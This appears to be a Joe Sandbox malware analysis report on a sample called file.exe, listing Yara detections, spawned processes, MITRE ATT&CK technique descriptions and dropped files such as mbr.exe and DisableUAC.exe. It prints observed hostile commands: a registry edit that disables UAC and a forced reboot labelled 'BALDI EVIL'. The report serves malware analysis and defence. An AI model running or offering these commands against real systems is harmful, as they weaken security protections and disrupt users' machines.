Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.379502958.0000016157B60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000003.378633984.0000016157B70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.379654166.0000016157B70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000003.379239394.0000016157B6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.379709392.0000016157DD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.379502958.0000016157B6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exePID: 6844, Parent PID: 5436

General

Target ID:	8
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: reg.exePID: 5744, Parent PID: 6040

General

Target ID:	9
Start time:	17:16:41
Start date:	06/06/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7447d0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.378526790.000001FFF3EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.378545012.000001FFF3F00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.378526790.000001FFF3EF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: shutdown.exePID: 3816, Parent PID: 6040

General

Target ID:	10
Start time:	17:16:41
Start date:	06/06/2023
Path:	C:\Windows\System32\shutdown.exe
Wow64 process (32bit):	false
Commandline:	shutdown -r -t 1 -c "BALDI EVIL..."
Imagebase:	0x7ff65a9e0000
File size:	26624 bytes
MD5 hash:	7A22F98F0B7BAEEF5FE1965F075A5E95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.379169390.000001E5CE7B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.379112663.000001E5CE4F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.379112663.000001E5CE4F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.379169390.000001E5CE7B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Baldi\7note.mp3

C:\Baldi\Baldi.exe

C:\Baldi\CleanZUpdater.bat

C:\Baldi\DisableUAC.exe

C:\Baldi\kill.exe

C:\Baldi\lol.png

C:\Baldi\mbr.exe

C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
file.exe